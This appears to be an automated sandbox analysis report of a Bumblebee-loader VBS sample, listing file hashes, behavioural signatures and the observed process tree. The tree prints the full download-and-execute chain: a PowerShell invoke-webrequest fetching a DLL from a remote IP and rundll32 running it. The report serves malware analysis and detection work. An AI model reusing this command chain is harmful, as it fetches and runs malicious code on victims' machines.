Analysis
-
max time kernel
141s -
max time network
150s -
platform
windows10-2004_x64 -
resource
win10v2004-20230831-en -
resource tags
arch:x64arch:x86image:win10v2004-20230831-enlocale:en-usos:windows10-2004-x64system -
submitted
14/09/2023, 07:50
Static task
static1
Behavioral task
behavioral1
Sample
IN(11)-9-12-2023_639663.vbs
Resource
win7-20230831-en
General
-
Target
IN(11)-9-12-2023_639663.vbs
-
Size
1KB
-
MD5
8cd1c23782729f7b13e3132032059e51
-
SHA1
7a32b8a787374840daeea67c1961085546820cb5
-
SHA256
b820d64062d79bda89ff168acff318a14a4a0e8a06b69b074452e738ba6d485c
-
SHA512
b7b95148b05713a80ba72b2e1343f12f713734280d54bc69cb1c653710bfad708459c8a9e102d2446cd38e220caff51b634bc012459df57294282e888677de17
Malware Config
Extracted
bumblebee
js1
Signatures
-
Blocklisted process makes network request 5 IoCs
flow pid Process 13 3024 powershell.exe 55 3156 rundll32.exe 57 3156 rundll32.exe 58 3156 rundll32.exe 59 3156 rundll32.exe -
Downloads MZ/PE file
-
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-2415528079-3794552930-4264847036-1000\Control Panel\International\Geo\Nation WScript.exe -
Loads dropped DLL 1 IoCs
pid Process 3156 rundll32.exe -
Suspicious use of NtCreateThreadExHideFromDebugger 1 IoCs
pid Process 3156 rundll32.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Suspicious behavior: EnumeratesProcesses 2 IoCs
pid Process 3024 powershell.exe 3024 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 3024 powershell.exe -
Suspicious use of WriteProcessMemory 4 IoCs
description pid Process procid_target PID 3888 wrote to memory of 3024 3888 WScript.exe 85 PID 3888 wrote to memory of 3024 3888 WScript.exe 85 PID 3888 wrote to memory of 3156 3888 WScript.exe 99 PID 3888 wrote to memory of 3156 3888 WScript.exe 99
Processes
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\IN(11)-9-12-2023_639663.vbs"1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:3888 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" invoke-webrequest -uri 'http://23.88.100.71/jyi6mm2w2g.dll' -outfile 'c:\users\public\name.dll';2⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3024
-
-
C:\Windows\System32\rundll32.exe"C:\Windows\System32\rundll32.exe" c:\users\public\name.dll,DllRegisterServer2⤵
- Blocklisted process makes network request
- Loads dropped DLL
- Suspicious use of NtCreateThreadExHideFromDebugger
PID:3156
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
1.1MB
MD57d2156efddf126dfb4c466da06f15e11
SHA1cf90131f73f72b7f32bccca438283a04a1001dbe
SHA256452bb497728f1eb2ccd56b83f7a13e51447bd79852085e68908cb6c47625060b
SHA51283496c49175e85e627ff320ec954f1e393d1473e17bf098f3dfbb98c09b18da6c1d4258bdcfcecc382a8da91424ff63ad882deb8a9572fecb6c667b131d74fe4
-
Filesize
1.1MB
MD57d2156efddf126dfb4c466da06f15e11
SHA1cf90131f73f72b7f32bccca438283a04a1001dbe
SHA256452bb497728f1eb2ccd56b83f7a13e51447bd79852085e68908cb6c47625060b
SHA51283496c49175e85e627ff320ec954f1e393d1473e17bf098f3dfbb98c09b18da6c1d4258bdcfcecc382a8da91424ff63ad882deb8a9572fecb6c667b131d74fe4